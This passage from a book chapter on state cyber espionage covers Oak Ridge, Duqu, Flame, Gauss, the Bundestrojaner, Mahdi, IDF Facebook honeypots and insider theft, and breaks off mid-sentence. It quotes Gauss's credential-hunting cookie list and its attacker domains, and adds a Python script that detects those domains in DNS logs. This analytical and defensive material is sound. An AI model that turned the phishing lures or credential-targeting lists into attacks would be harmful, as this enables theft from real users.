Oak Ridge National Laboratory in Tennessee is the largest research institution focusing on energy-related science and technology under the umbrella of the Department of Energy. The lab, with a workforce of more than 4,200 and approximately 3,000 guest researchers a year, is one of America’s leading neutron science and nuclear energy research institutions. It houses some of the world’s most powerful computers. On 7 April 2011, unknown attackers set their sights on the lab. The attack was shrewd. A spoofed email purportedly from the lab’s human resources office led to a zero-day exploit, that is, an exploit for a previously unknown vulnerability, possibly in Microsoft Internet Explorer or Adobe Flash Player. The fake email was sent to 573 employees, informing them of benefit-related changes and inviting them to follow a link for more detailed information. This trick succeeded. Department of Energy officials specified that the attacker had managed to steal approximately 1 gigabyte of data, the equivalent of a few thousand photos, or 1/64 of the storage of a standard smart phone. “When I think about how many pictures my daughter has on her iPhone, it’s really not a significant amount of data,” said Barbara Penland, the deputy director of communications for the Oak Ridge National Lab. 19 Thom Mason, Oak Ridge’s director, suspected the attackers were after scientific data. Yet they seem to have failed to penetrate the lab’s classified network. In the aftermath of the attack, Oak Ridge turned off Internet access, including email, to cut off possibly ongoing exfiltration as well as follow-on attacks.

The attack was not the lab’s first. On 29 October 2007, Oak Ridge had already suffered a serious attack, along with other federal labs, including Los Alamos National Laboratory in New Mexico and California’s Lawrence Livermore National Laboratory. An unknown group of hackers had sent email messages with malicious attachments to a large number of employees, with some staff members receiving seven phishing emails designed to appear legitimate. One email mentioned a scientific conference and another contained information about a Federal Trade Commission complaint. In total, the attack included 1,100 attempts to penetrate the lab. At Oak Ridge, eleven employees opened a dodgy attachment, which allowed the attackers to exfiltrate data. The data were most likely stolen from a database that contained personal information about the lab’s external visitors going back to 1990. Although the information contained sensitive personal details, such as Social Security numbers, it was probably the coveted research results or designs that the attackers were after. At Los Alamos, one of only two sites in the United States specializing in top-secret nuclear weapons research, hackers also successfully infiltrated the unclassified network and stole “a significant amount of data,” a spokesman admitted. 20 DHS officials were later able to link that attack to China. The US Computer Emergency Readiness Team, US-CERT, backed up that claim with a list of IP addresses registered in China that were used in the attack. Yet the details were not granular enough to link the attack to any particular agency or company. Ultimately the US was unable to attribute a wave of sophisticated attacks against some of the country’s most sensitive research installations.

A comparable case was “Duqu.” In early October 2011, the Laboratory
of Cryptography and System Security, geekily abbreviated as
CrySyS Lab, at the Budapest University of Technology and Economics
discovered a new and exceptionally sophisticated malware threat which
created files with the prefix “~DQ,” and so the Hungarian engineers
analyzing it called it Duqu. 21 The threat was identified as a remote access
tool, or RAT. Duqu’s mission was to gather intelligence from control
systems manufacturers, probably to enable a future cyber attack against
a third party using the control systems of interest. “The attackers,”
Symantec speculated, “are looking for information such as design documents
that could help them mount a future attack on an industrial
control facility.” 22 Duqu was found in a number of unnamed companies
in at least eight countries, predominantly in Europe. 23 The breaches
seem to have been launched by targeted emails, “spear phishing” in
security jargon, rather than by mass spam. In one of the first attacks, a
“Mr. B. Jason” sent two emails with an attached MS Word document to
the targeted company, the name of which was specifically mentioned in
the subject line as well as in the email’s text. The first email, sent on 17
April 2011 from a probably hijacked proxy in Seoul, Korea, was intercepted
by the company’s spam filter. But the second email, sent on 21
April with the same credentials, went through and the recipient opened
the attachment. Duqu had a keylogger, was able to take screenshots,
exfiltrate data, and exploit a Windows kernel vulnerability, a highly
valuable exploit. The threat did not self-replicate, and although it was
advanced it did not have the capability to act autonomously. Instead, it
had to be instructed by a command-and-control server. In one case,
Duqu downloaded an infostealer that was able to record keystrokes and
collect system data. These data were encrypted and sent back to the
command-and-control server in the form of .jpg images so as not to
arouse the suspicion of network administrators. The command-and-control
server could also instruct Duqu to spread locally via internal
network resources.

All these attacks seemed to follow the same pattern. Duqu’s authors
created a separate set of attack files for every single victim, including the
compromised .doc file; they used a unique control server in each case;
and the exploit was embedded in a fake font called “Dexter Regular,”
including a prank copyright reference to “Showtime Inc,” the company
that produces the popular Dexter sitcom about a crime scene investigator
who is also a part-time serial killer. 24 Symantec and CrySyS Lab
pointed out that there were “striking similarities” between Stuxnet and
Duqu and surmised that the two were written by the same authors: both
were modular, used a similar injection mechanism, exploited a Windows
kernel vulnerability, had a digitally signed driver, were connected to the
Taiwanese hardware company JMicron, shared a similar design philosophy,
and used highly target-specific intelligence. 25 One component of
Duqu was also nearly identical to Stuxnet. 26 But in one crucial way the
two threats were very different: Duqu, unlike Stuxnet, was not code that
had been weaponized. It was neither intended, designed, nor used to
harm anything, only to gather information, albeit in a sophisticated way.

One of the most sophisticated cyber espionage operations to date
became public in late April 2012 when Iran’s oil ministry reported an
attack that was initially known as Wiper. Details at the time were scarce,
and the story subsided. Then, a month later, a Hungarian research group
published a report on the attack that quickly led to it acquiring the
nickname Flame. Competing names in the initial frenzy were “Flamer”
and “Skywiper.” Several parties announcing their finds on the same day
created this confusion. On 28 May 2012, CrySyS Lab published a detailed
63-page report on the malware. Simultaneously, Kaspersky Lab in
Russia announced news of the malware. The Iranian national CERT, the
Maher Centre, had contacted well-known anti-virus vendors to alert
them to the threat, dubbed by Hungarian experts to be “the most
sophisticated” and “the most complex malware ever found.” 27 Other
experts agreed. “Overall, we can say Flame is one of the most complex
threats ever discovered,” Kaspersky Lab wrote. 28 The Washington Post also
acknowledged the threat: “The virus is among the most sophisticated
and subversive pieces of malware to be exposed to date.” 29

The new catch was indeed remarkable. Flame was a highly complex
listening device, a bug on steroids: the worm was able to hijack a
computer’s microphone in order to record audio clandestinely; secretly
shoot pictures with a computer’s built-in camera; take screenshots of
specific applications; log keyboard activity; capture network traffic;
record Skype calls; extract geolocation from images; send and receive
commands and data through Bluetooth; and of course exfiltrate locally
stored documents to a network of command-and-control servers.
Meanwhile the worm was dressed up as a legitimate Microsoft update.
The 20MB-heavy file was approximately twenty times larger than
Stuxnet, which made it nearly impossible to spread itself by email, for
instance. Yet its handlers kept Flame on a short leash. The spying tool
was highly targeted. Kaspersky Lab pointed out that it was a backdoor,
a Trojan, and the malware had “worm-like features,” which allowed the
software’s remote human handlers to give commands to replicate inside
a local network and through removable drives. Kaspersky also estimated
the number of infected machines to be rather small, around 1,000.
Once it arrived on a targeted machine, the spying software went to work
by launching an entire set of operations, including sniffing the network
traffic and taking screenshots of selected “interesting” applications, such as
browsers, email clients, and instant messaging services. Flame was also
able to record audio conversations through a computer’s built-in microphone,
if there was one, and to exfiltrate the audio files in compressed
form. It could also intercept keystrokes and pull off other eavesdropping
activities. Large amounts of data were then sent back, on a regular schedule,
to Flame’s masters through a covert and encrypted SSL channel via
predefined command-and-control servers. One of Flame’s most notable
features was its modularity. Its handlers could install additional functionality
into their spying vehicle, much like apps on an iPhone. Kaspersky
Lab estimated that about twenty additional modules had been developed.
Flame also contained a “suicide” functionality. 30 The lab confirmed
that Stuxnet and Flame shared some design features. 31

Flame’s most impressive feature is not its multi-purpose design, but
its success. The quality and the volume of intelligence that the espionage
tool dispatched to its masters remain unknown, and that is highly unlikely
to change. The development and possibly the deployment of Flame
started as early as December 2006, logs from the command-and-control
code show. The online sleuths, in other words, may have operated in the
dark for as long as five years. A great deal of camouflage was necessary
to accomplish this. The code also indicates that at least four programmers
developed the code, and that team of four authors devised clever
methods to disguise their operation. One is the control panel design.
The site with the control interface looked like the early alpha version of
a command-and-control panel for botnets, with vintage blue links,
purple when clicked, raw table frames, no graphics, no animations. But
the attackers, it seems, deliberately chose a simple-looking and unpretentious
interface. They also used unsuspicious words like “data, upload,
download, client, news, blog, ads, backup,” not botnet, infection, or
attack. “We believe this was deliberately done to deceive hosting company
sys-admins who might run unexpected checks,” Kaspersky Lab
wrote. 32 The attackers worked hard to make their effort appear as if it
was a legal content management system. Another attempt to camouflage
Flame was the unusually strong encryption of the stolen data itself.

On 1 June 2012 The New York Times broke the news that the US
government developed Stuxnet, the world’s most sophisticated publicly
known cyber attack to date. The US government still did not officially
admit its authorship, but an FBI investigation into the leaks that led the
Times to the story can be seen as a tacit statement of fact. Thereafter
officials would occasionally comment on various aspects of government-sponsored
computer attacks. Once anti-virus companies like Symantec
and Kaspersky Lab discovered malware, government-made or not,
patches and anti-virus measures were made available relatively quickly in
order to counter the threat to their customers. Anti-virus companies, in
short, could directly counter a US government-sponsored espionage
program or even a covert operation. In the case of Flame, one anonymous
US government official felt the need to reassure The Washington
Post’s readership that America’s cyber attack was not neutralized by countermeasures
against Stuxnet and Flame: “It doesn’t mean that other tools
aren’t in play or performing effectively,” one former high-ranking American
intelligence official told The Washington Post. “This is about preparing
the battlefield for another type of covert action,” he said. Stuxnet
and Flame, the official added, were elements of a broader and ongoing
campaign, codenamed Olympic Games, which had yet to be uncovered.
“Cyber collection against the Iranian program is way further down the
road than this,” as The Washington Post quoted its anonymous source. 33
Allegedly, the joint operation involved the National Security Agency, the
CIA, and most probably IDF Unit 8200. Meanwhile Iran admitted that
Flame posed a new problem but did not offer many details. “The virus
penetrated some fields—one of them was the oil sector,” Gholam Reza
Jalali, an Iranian military official in charge of cyber security, was quoted
on Iranian state radio in May. “Fortunately, we detected and controlled
this single incident.” 34 It did not remain a single incident.

For hunters of government-sponsored espionage software, 2012 was
shaping up to be the busiest year on record. The summer that year was
exceptionally hot, especially in Washington, DC. On 9 August it was
again Kaspersky Lab who found the newest cyber espionage platform:
Gauss. The malware’s capabilities were notable. Gauss was a complex
cyber espionage toolkit, a veritable virtual Swiss army knife. Like Flame,
this spying software had a modular design. Its designers gave the different
modules the names of famous mathematicians, notably Kurt
Gödel, Joseph-Louis Lagrange, and Johann Carl Friedrich Gauss. The
last module contained the exfiltration capability and was thus the most
significant. The Russian geeks at Kaspersky therefore called their new
catch Gauss.

The software’s lifecycle may approximate one year. Kaspersky Lab
initially discovered the new malware in the context of a large investigation
initiated by the Geneva-based International Telecommunication
Union. Gauss was likely written in mid-2011. Its operational deployment
probably started in August and September of that year, just when
Hungarian anti-virus researchers discovered Duqu, another tool for
computer espionage probably created by the same entity that also designed
Gauss. The command-and-control infrastructure that serviced the
spying operation was shut down in July 2012.

Three of Gauss’s features stand out. The first is that the espionage
toolkit specialized in financial institutions, especially ones based in
Lebanon. The Gauss code, which came in the file winshell.ocx, contained
direct commands that were required to intercept data from specific
banks in Lebanon, including the Bank of Beirut, Byblos Bank, and
Fransabank. 35 Gauss attempted to find the login credentials for these
institutions by searching the cookies directory, retrieving all cookie files,
and carefully documenting the results in its logs. It specifically searched
for cookies that contained any of the following identifiers:

paypal; mastercard; eurocard; visa; americanexpress; bankofbeirut; eblf;
blombank; byblosbank; citibank; fransabank; yahoo; creditlibanais; amazon;
facebook; gmail; hotmail; ebay; maktoob

These identifiers denoted global Internet companies with many users
in Lebanon, including banks with significant operations in the country,
such as Citibank, or purely Lebanese banks such as Banque Libano-Française,
BLOM Bank, Credit Libanais, Fransabank, and Byblos Bank,
as well as some Lebanese-founded institutions with international
outreach. “This is the first publicly known nation-state sponsored banking
Trojan,” Kaspersky Lab concluded in their highly detailed 48-page
report on Gauss. Gauss’s geographical reach was notable but limited.
Kaspersky discovered more than 2,500 infections among its customers,
which means the overall number could be in the tens of thousands. That
would be significantly lower than many ordinary malware infections,
but much higher than the number of infections in the case of the highly
targeted Duqu, Flame, and Wiper attacks. The vast majority of victims,
more than 66 per cent, were found in Lebanon, almost 20 per cent in
Israel, and about 13 per cent in the Palestinian Territories.

The second notable feature was its carrying load. The software used
the Round Robin Domain Name Service, a technique used to handle
large data loads. A Round Robin-capable name server would respond to
multiple requests by handing out not the same host address, but a rotating
list of different host addresses, thus avoiding congestion. Gauss’s
command-and-control infrastructure, therefore, was designed to handle
a massive load of data sent back from its virtual spies. The authors of
Gauss invested a lot of work into that structure, including several servers
at the following addresses:

*.gowin7.com
*.secuurity.net
*.datajunction.org
*.bestcomputeradvisor.com
*.dotnetadvisor.info
*.guest-access.net 36

These addresses were registered under fake identities, Jason-Bourne-style.
Examples are: Peter Kulmann, Antala Straska, Prague (in reality a
pharmacy); Gilles Renaud, Neugasse 10, Zurich (a nondescript five-storey
apartment building); and Adolph Dybevek, Prinsens gate 6, Oslo
(a small hotel).
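As an added illustration (not from the book, nor from Kaspersky’s report), the following script shows how a defender could sweep resolver logs for the wildcard Gauss domains listed above and, at the same time, spot the rotating-answer pattern that Round Robin DNS produces. The log line format and the sample lines are constructed; the domain list is the one quoted in the text.

```python
"""Sweep DNS resolver logs for the Gauss command-and-control domains and
flag names that were answered with a rotating set of addresses.

Added example, not part of the book. The domain list is the one quoted
from Kaspersky Lab's Gauss report; the log format and the sample log
lines below are constructed for illustration."""
import re
from collections import defaultdict

# Wildcard C2 domains as listed in the text.
GAUSS_C2_DOMAINS = [
    "*.gowin7.com",
    "*.secuurity.net",
    "*.datajunction.org",
    "*.bestcomputeradvisor.com",
    "*.dotnetadvisor.info",
    "*.guest-access.net",
]

# Constructed log format (assumption): "<timestamp> <client> <qname> A <answer-ip>"
LOG_LINE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+A\s+(\S+)$")


def matches_wildcard(qname, pattern):
    """True if qname is the bare domain of a '*.' pattern or any subdomain of it.
    The leading dot in the suffix test keeps 'notgowin7.com' from matching '*.gowin7.com'."""
    qname = qname.rstrip(".").lower()
    base = pattern[2:].lower() if pattern.startswith("*.") else pattern.lower()
    return qname == base or qname.endswith("." + base)


def c2_domain_for(qname):
    """Return the matching wildcard pattern, or None if the name is not a Gauss C2 domain."""
    for pattern in GAUSS_C2_DOMAINS:
        if matches_wildcard(qname, pattern):
            return pattern
    return None


def analyse(log_lines):
    """Return (hits, round_robin).

    hits:        client address -> set of C2 names it resolved.
    round_robin: C2 name -> sorted distinct answer IPs, only for names that were
                 answered with more than one address (the rotating-list behaviour
                 of a Round Robin name server described in the text)."""
    hits = defaultdict(set)
    answers = defaultdict(set)
    for line in log_lines:
        m = LOG_LINE.match(line.strip())
        if not m:
            continue  # malformed or unrelated line, ignore
        _ts, client, qname, ip = m.groups()
        qname = qname.rstrip(".").lower()
        if c2_domain_for(qname) is None:
            continue
        hits[client].add(qname)
        answers[qname].add(ip)
    round_robin = {q: sorted(ips) for q, ips in answers.items() if len(ips) > 1}
    return dict(hits), round_robin


# Constructed sample log: one host polling a C2 name that rotates through three
# addresses, one host touching two other C2 names, plus benign look-alike traffic.
SAMPLE_LOG = [
    "2012-07-01T10:00:01 10.1.1.5 update.gowin7.com A 198.51.100.10",
    "2012-07-01T10:05:02 10.1.1.5 update.gowin7.com A 198.51.100.11",
    "2012-07-01T10:10:03 10.1.1.5 update.gowin7.com A 198.51.100.12",
    "2012-07-01T10:11:00 10.1.1.9 www.example.com A 93.184.216.34",
    "2012-07-01T10:12:00 10.1.1.9 cdn.datajunction.org A 198.51.100.20",
    "2012-07-01T10:13:00 10.1.1.9 notgowin7.com A 203.0.113.5",
    "2012-07-01T10:14:00 10.1.1.9 guest-access.net. A 198.51.100.30",
]

if __name__ == "__main__":
    hits, round_robin = analyse(SAMPLE_LOG)
    for client, names in sorted(hits.items()):
        print(f"{client}: resolved Gauss C2 names {sorted(names)}")
    for name, ips in sorted(round_robin.items()):
        print(f"{name}: round-robin answers {ips}")
```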

The third notable feature was Gauss’s mystery features. The malware’s
main payload module, named Gödel, had a seemingly exceptionally
strong encryption. Kaspersky Lab was unable to crack the code and took
the unusual step of crowdsourcing the task: “If you are a world class
cryptographer or if you can help us with decrypting them, please contact
us,” the computer scientists wrote. Another mysterious feature is a
seemingly superfluous unique custom font, “Palida Narrow.” The
purpose of this font is unknown. One remote possibility is that the font
could serve as some form of marker for a potential target.

Gauss, in sum, has the look and feel of a state-sponsored attack. Several
arguments back up this assumption. One is that Kaspersky discovered
the virus when it was looking for commonalities that the software
shared with Flame. The researchers found a similar architecture, similar
module compositions, similar code bases, similar means of communication
with command-and-control servers, and the exploitation of a specific
vulnerability, the so-called .LNK vulnerability, which was already
used in Stuxnet and Flame. One of Gauss’s modules contains a path
c:\documents and settings\flamer\desktop\gauss_white_1, where the “flamer”
stands for the Windows username that created the product. 37
Taking all these clues together, it indeed looks as if “Gauss was created
by the same ‘factory’ which produced Flame,” as Kaspersky concluded
their analysis. 38 A second reason is the software’s sophistication and professional
execution. And finally, and most convincingly, the target set
indicates a state sponsor. Lebanon is home to Hezbollah, an organization
that is politically, criminally, and militarily a major player in the
region—and, since 1999, on the US State Department’s list of Foreign
Terrorist Organizations. The US administration has long been concerned
about Hezbollah money-laundering through Lebanon’s legitimate
lenders, but has so far failed to produce evidence of this. “There are a
number of articles published in prestigious U.S. newspapers that claim
that some of our banks are hoarding illegal cash or getting involved in
terrorist funding,” Makram Sader, the secretary-general of the Association
of Banks in Lebanon, was quoted in July 2012. “All these allegations
were not substantiated by their authors.” 39 Gauss could have been designed
to change this.

Stuxnet, Duqu, Flame, and Gauss have one other thing in common:
most likely, some of these complex malwares were clandestinely operating
for years before security researchers in private companies detected
them. They demonstrate a remarkable failure on the part of the anti-virus
industry. Their failure is visible because their business model is
developing and publishing products that mitigate such threats. Whether
the world’s finest signal intelligence agencies—excluding those that
potentially developed the attack tools—have also failed is more difficult
to say because spies don’t publish what they know. But it is a fair
assumption that if McAfee and Symantec miss a threat, the Bundesnachrichtendienst,
the DGSE, and GCHQ could do so as well—not to
speak of smaller, less well-resourced intelligence agencies. Unless, of
course, these agencies themselves are the authors of an attack. That,
increasingly, seems to be the case.

The German government’s first known use of computer espionage is
the so-called Bundestrojaner. On 8 October 2011, the Chaos Computer
Club caused a political uproar in Berlin. Germany’s famous hacker club
broke news by publishing a report that accused the federal government
of using a backdoor Trojan to spy on criminal suspects inside Germany.
Bund means federal in German, so the press started referring to the
malware as Bundestrojaner. The software was able to take screenshots of
browser windows and Skype, to record VoIP conversations, and even to
download more functional modules that were yet to be defined. 40 The
CCC hackers accused the federal government of “state voyeurism” and,
because the Trojan’s security precautions were allegedly faulty, of enabling
third parties to abuse the software. In the following days several German
states admitted using the spyware, although, officials insisted, under
strict legal limitations. Noteworthy for spyware that was ordered by the
German government is the home address of the command-and-control
server: the commercial ISP Web Intellects based in Columbus, Ohio. 41

On 7 September 2012, closer to Ohio than Berlin, Debora Plunkett,
director of the information assurance directorate at the US National
Security Agency, gave a lecture at the Polytechnic Institute of New York
University. She spoke about defending cyberspace. “We’re starting to see
nation-state resources and expertise employed in what we would characterize
as reckless and disruptive, destructive behaviours.” 42 Plunkett,
surprisingly, did not speak about the United States and its allies. Nor did
she mention Stuxnet, Flame, Gauss, or the roof program Olympic
Games. She spoke about America’s adversaries. It is therefore important
to face a stark reality: Western countries are leading the charge in cyber
espionage. Stuxnet, Flame, and the Bundestrojaner are only among the
best-documented cases. So it should not come as a surprise, as with
many other Western tactical innovations, that less developed states are
trying to catch up and develop their cyber espionage capabilities. Non-democratic
states, naturally, are not limited by the same institutional,
legal, and ethical constraints as liberal democracies. One case from the
Middle East is especially curious.

The case in question is known as “Mahdi.” As mentioned previously,
2012 proved a busy year for malware analysts, and this was especially the
case for those with an interest in the Middle East. In July of that year a
most curious incident became public. In Islam, the Mahdi is a messiah-like
figure, a redeemer. Belief in the Mahdi is an especially important
concept in Shia Islam, where the return of the Twelfth Imam is seen as
the prophesized coming of the savior. And Iran is a predominantly Shia
country. The malware’s name comes from its dropper, which also executed
a text file, mahdi.txt. The file would in turn open a Word document
that contained a particular news article, published by Eli Lake from The
Daily Beast in November 2011, “Israel’s Secret Iran Attack Plan: Electronic
Warfare.” The article described how Israel had developed “multi-billion
dollar electronic weapons” that could be deployed in the event of
Israel attacking Iran’s nuclear installations. 43 The Mahdi malware was not
as powerful as other espionage packages that ricocheted through the
region that year. But it was still remarkable.

Most remarkable of all were Mahdi’s ornaments and social engineering,
rather than the technology itself: in particular, the kind of social
engineering the attackers used to trick their victims into opening malicious
email attachments. To infiltrate victims specifically located in
Israel, the Mahdi attackers sent an email that contained a PowerPoint
presentation, Moses_pic1.pps, with text in English as well as Hebrew.
The attackers had embedded executable code as an “activated content”
in one of the slides. The presentation started by asking “Would you like
to see the Moses?” in English and broken Hebrew (receiving such bilingual
content is not unusual in Israel, where many immigrants from
English-speaking countries—“Anglos”—may still be working on their
Hebrew, hence broken Hebrew is not necessarily suspicious). The text
was set against a series of tranquil and peaceful nature-themed images of
snow-capped mountains, forest lakes, and tropical beaches. When the
presentation had reached the slide with the embedded executable code,
the text instructed the viewer—who by now may have been daydreaming
about the next holiday or spiritual experience—to “look at the
four central points of the next picture | for 30 seconds ... please click
this file.” The attackers had carefully crafted their text and anticipated
that Microsoft Office would now display a pop-up window with a yellow
exclamation mark, annoyingly interrupting the user’s joy with the
religiously themed album: “You are about to activate an inserted object
that may contain viruses or otherwise be harmful to your computer.
Make sure the object is from a trustworthy source. Do you want to
continue?” Dozens of Israeli users wanted to continue, the attack statistics
show. Once the malware was installed, it was able to perform a
number of information-stealing operations: keylogging, screenshot capture,
audio-recording, and data exfiltration. Mahdi included a screenshot
capture functionality that was triggered by communication through
Facebook, Gmail, Hotmail, and other popular platforms. Yet technically,
from a programmer’s point of view, the attack was simple and inelegantly
designed. “No extended 0-day research efforts, no security researcher
commitments or big salaries were required,” commented Kaspersky
Lab. 44 It seems that the attack continued for eight months.

As with almost all cases of political malware, attribution was highly
difficult and incomplete. So far it has not been possible to link Mahdi
to a specific actor or agency. But because the code was not particularly
sophisticated, it seems highly plausible that Mahdi was an Iranian operation:
an Israeli security firm discovered that some of the malware’s
communication with its command-and-control servers, some of them
in Canada, contained calendar dates in Persian format as well as code
with strings in Farsi, the language spoken in Iran. 45 Another indicator
is Mahdi’s conspicuous list of targets. The
800 victims included companies that provide critical infrastructure,
financial firms, and embassies. All targets were geographically located in
the wider Middle Eastern region, the vast majority in Iran, followed by
Israel, Afghanistan, Saudi Arabia, and the Emirates—all of these
countries are either open enemies or regional rivals of Iran (with the
exception of Afghanistan, which in 2012 still hosted the armed forces of
many countries Iran considers adversaries).

Mahdi was certainly not as impressive as high-powered Chinese intrusions.
But cyber espionage does not necessarily have to be technically
sophisticated to be successful. Israel offers two interesting cases, this
time not as a high-skilled attacker switching off air-defenses or stealthily
sabotaging nuclear enrichment plants—but as a victim of cyber attack.
This is not despite, but because of its technological prowess. More than
any other country in the region, the Jewish State is a veritable high-tech
nation. By 2009, Israel had more companies listed on the tech-oriented
NASDAQ index in New York than all continental European countries
combined. 46 Naturally, online social networks grew rapidly in Israel,
including in the armed forces, with Facebook proving to be especially
popular. In early 2011, the country’s Facebook penetration had grown
to nearly 50 per cent of Israel’s overall population. Israel was one of the
most connected countries on the social network, with 71 per cent of all
users being under the age of thirty-five. 47 This created a novel espionage
opportunity for Israel’s enemies and it was only a question of time until
they would try to exploit this public, or at least semi-public, trove of
information. Indeed, Hezbollah soon started collecting intelligence on
online social networks. Military officers had long been wary of operational
security; many were especially concerned about the spotty risk awareness
of draftees and young recruits. The IDF, somewhat surprisingly,
was slow in including Facebook sensibilization in its basic training.
Israeli officers had good reason to be concerned. Already in September
2008, Israeli intelligence allegedly warned of Facebook-related enemy
infiltrations: “Facebook is a major resource for terrorists, seeking to
gather information on soldiers and IDF units,” a report in the Lebanese
news outlet Ya Libnan said, “the fear is soldiers might even unknowingly
arrange to meet an internet companion who in reality is a terrorist.” 48
Around that time, Hezbollah was probably already testing the waters
and starting to infiltrate the Israeli Army via Facebook. One operation
became public in May 2010, more than a year after it had been
launched. Reut Zukerman was the cover name of a fake Facebook persona
allegedly created by Hezbollah operatives. The girl’s profile photo
showed her lying on a sofa, smiling innocently. Hackers call such
deceptive lures, set up to draw in the unwary, “honeypots,”
although usually the term is not used in the context of social
networks. In Zukerman’s case the honeypot was an attractive young
woman, but not too salacious to be suspicious or lacking in credibility.
Approximately 200 elite soldiers and reservists responded to Zukerman’s
friendship requests over the course of several months. Once the profile
had accumulated a visible group of contacts on Facebook, newcomers
assumed that Reut would be just another Special Forces soldier herself.
“Zukerman” allegedly succeeded in gaining the trust of several soldiers
who volunteered information about the names of other service personnel,
along with explanations of jargon, detailed descriptions of military
bases, and even codes. Only after one full year did one of Zukerman’s
“friends” become suspicious and alert the IDF’s responsible unit. 49

In July 2010, one of the Israel Defense Force’s most serious security
breaches became known. Soldiers serving at one of the country’s most
highly classified military bases opened a Facebook group. Veterans of the
base could upload photos and videos of their shared time in the IDF.
The group boasted a motto, in Hebrew, “There are things hidden from
us, which we will never know or understand.” The group had grown to
265 members, all approved by an administrator. But the administrators
apparently did a sloppy job. A journalist from the Israeli daily Yedioth
Aharonot got access to the group, did some research, and wrote a story.
“Guys, we were privileged to get to be in this fantastic place,” one veteran
wrote, “Keep in touch and protect the secret.” 50 The group members
posted pictures of themselves on the base. Yet, according to Yedioth, the
material made available by the group did not contain any compromising
information. Some of the group’s members had repeatedly warned on
the page’s wall not to upload classified or sensitive information.

One feature that appears as a common trait in almost all high-profile
cyber espionage cases is the use of some form of social engineering, or
spear-phishing. The use of emails or websites that trick users into unwittingly
installing malware highlights the human dimension of cyber
espionage. This human dimension is more important, at closer examination,
than commonly assumed. Two of the most high-profile examples
on record illustrate this significance of human sources for computer
espionage: the first is a Chinese operation, the second an American one.

A recent row between an American and a Chinese maker of wind turbines
is instructive. AMSC, an American green energy company formerly known as
American Superconductor Corp., based in Devens, Massachusetts, sought
$1.2bn in damages, making the case the largest intellectual property
dispute between the US and China on record. Sinovel, China's biggest
manufacturer of such turbines, is known for building the country's first
offshore wind farm. Sinovel used to be AMSC's largest customer,
accounting for about 70 per cent of the American company's revenue. But
on 5 April, the US company informed its shareholders that Sinovel was
refusing delivery of its products and had cancelled contracts during the
previous month. 51 "We first thought that this was an inventory issue,
and we were understanding," Jason Fredette, AMSC's vice president of
communications and marketing, told IEEE Spectrum. "Then in June we
discovered this IP theft, and that changed things quite a bit." 52 The
design the Chinese company was after was a new software package that
enabled so-called "low-voltage ride through," which keeps a turbine
connected and running through brief voltage dips on the grid instead of
tripping offline. AMSC reportedly gave Sinovel a sample for testing
purposes, but the brand-new software had an expiry date, just as some
commercial software suites require a purchase after thirty days or so.
So when an employee in China discovered a turbine operating with
"cracked" software beyond its expiry date, AMSC became suspicious.
Somebody from inside the firm must have helped the Chinese to remove the
expiry date, the company reckoned. The Massachusetts-based firm started
an investigation. Only a limited number of AMSC's employees had access to
the "low-voltage ride through" software in question, and even fewer of
them had traveled to China. The firm quickly identified one of its staff
based in Austria, Dejan Karabasevic. At the time of the leak this
38-year-old Serbian was working as a manager at Windtec Solutions, a
Klagenfurt-based subsidiary of American Superconductor. The suspect
confessed while awaiting trial in an Austrian prison. On 23 September,
the engineer was sentenced to one year in jail and two years of
probation. The Klagenfurt district court also ordered Karabasevic to pay
$270,000 in damages to his former American employer. As emerged during
the trial, Karabasevic had used a thumb drive to exfiltrate "large
amounts of data" from his work laptop at Windtec in April 2011, the
Austrian judge Christian Leibheuser-Karl reported, including the entire
source code of a crucial program in its most recent version. He then
allegedly sent the relevant code via his Gmail account to his contacts at
Sinovel. This source code enabled the Chinese company to modify the
control and supervisory program. Thanks to the rogue engineer's help, the
Chinese were able to copy and modify the software at will, circumventing
the purchase of new software versions as well as new licences. The
Austrian prosecutors estimated that Karabasevic had received €15,000 from
Sinovel for his services. 53 Florian Kremslehner, an Austrian lawyer
representing American Superconductor, revealed that his client had
evidence that Sinovel had lured its valuable spy by offering him an
apartment, a five-year contract that would have doubled his AMSC salary,
and "all the human contact" he desired, the attorney said, "in
particular, female co-workers." 54 The affair was economically highly
damaging for American Superconductor. The company's yearly revenue
dropped by almost 90 per cent; its stock plunged from $40 to $4; it cut
30 per cent of its workforce, around 150 jobs; and it reported a net
loss of $37.7 million in the first quarter after the Sinovel affair. 55
Note that the controls which eventually exposed the theft were not
technical ones: a time-limited sample that betrayed the cracked copy, and
an access list short enough to narrow the suspects to a handful of people.

A second instructive example is offered by the lead-up phase to
Operation Olympic Games. Even the Stuxnet saga, the only potent cyber
weapon ever deployed, demonstrates the continued significance of human
agents in getting coveted, actionable intelligence. The "holy grail," in
the words of one of the attack's architects, was getting a piece of
espionage software into the control system at Natanz. The designers of
what was to become the Stuxnet worm needed fine-grained data from inside
the Iranian plant to develop their weaponized code. 56 The problem was
that the control system was air gapped, as it should be. But the
American intelligence operatives had a list of people who were
physically visiting the plant to work on its computer equipment, and who
therefore traveled across the air gap. The list included scientists as
well as maintenance engineers. Anybody could carry the payload into the
targeted plant, even without knowing it. "We had to find an unwitting
person on the Iranian side of the house who could jump the gap," one
planner later told Sanger. 57 The list of possible carriers included
Siemens engineers, who were helping their Iranian colleagues maintain
the programmable logic controllers. Their work would often involve
updating or modifying parts of the program that ran on the PLCs, but
because the controllers have no keyboard and screen of their own, the
work had to be done on the engineers' laptops, and the laptops had to be
connected directly to the PLCs to change their software. The engineering
laptop is thus the one device that legitimately crosses the air gap, in
both directions and on a regular schedule, which is precisely what makes
it the natural carrier. Siemens was reportedly helping the Iranians
maintain their systems every few weeks. Siemens, it should be noted, had
been dealing with Iran for nearly one-and-a-half centuries. In 1859, the
company's founder Werner von Siemens emphasized the importance of
business in Iran in a letter to his brother Carl in Saint Petersburg. In
1870 Siemens completed the construction of the 11,000-kilometer
Indo-European telegraph line, linking London to Calcutta via Tehran. 58
Some 140 years later, Siemens engineers were again carrying a novel
piece of IT equipment into Iran, but this time without their knowledge:
"Siemens had no idea they were a carrier," one US official told Sanger.
"It turns out there is always an idiot around who doesn't think much
about the thumb drive in their hand." 59 American intelligence agencies
apparently did not infiltrate Siemens, as they sought to avoid damaging
their relationship with Germany's Bundesnachrichtendienst, the country's
foreign intelligence service. But Israel was allegedly not held back by
such considerations. Another version of events is that Siemens engineers
willingly helped infiltrate the malware into Natanz. One recent book on
the history of the Mossad, Spies Against Armageddon, claims that the
Bundesnachrichtendienst, an agency traditionally friendly to Israel out
of a habit of trying to right past wrongs against the Jewish people
during the Holocaust, "arranged the cooperation of Siemens." 60
Executives at Siemens may have "felt pangs of conscience," the
Israeli-American authors suspected, or they may simply have reacted to
